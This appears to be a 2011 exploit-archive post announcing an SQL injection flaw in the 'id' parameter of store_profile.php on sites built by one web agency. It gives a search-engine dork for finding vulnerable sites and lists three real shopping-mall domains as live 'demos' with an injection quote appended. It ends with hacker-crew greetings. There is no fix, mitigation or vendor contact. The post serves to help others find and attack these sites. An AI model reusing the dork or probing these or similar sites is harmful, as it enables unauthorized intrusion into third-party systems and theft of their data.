id: 16272
date: 06/07/2011
title: Circus Strategic Communications Inc SQL Injection Vulnerability
author: k's0uR!
cves: 

[+] Exploit Title : Circus Strategic Communications Inc.. Sql injection
[+] Date : 07 June 2011
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "developed and managed by Circus Strategic Communications"
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2

#########################################################

http://localhost/store_profile.php?id=Sql here

#########################################################

D3m0s :

http://www.parklandmall.ca/store_profile.php?id=1146'

http://www.shoppersmall-brandon.com/store_profile.php?id=888'

http://www.cambridge-centre.com/store_profile.php?id=265'

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+]Greetz To : hercule-32 / f3rj4N! / mouadh info0/ An4s / !H3-b-/ all my friends/ tunisian hackers..!!

[+] Made in tunisia...



#  0day.today [2023-03-25]  #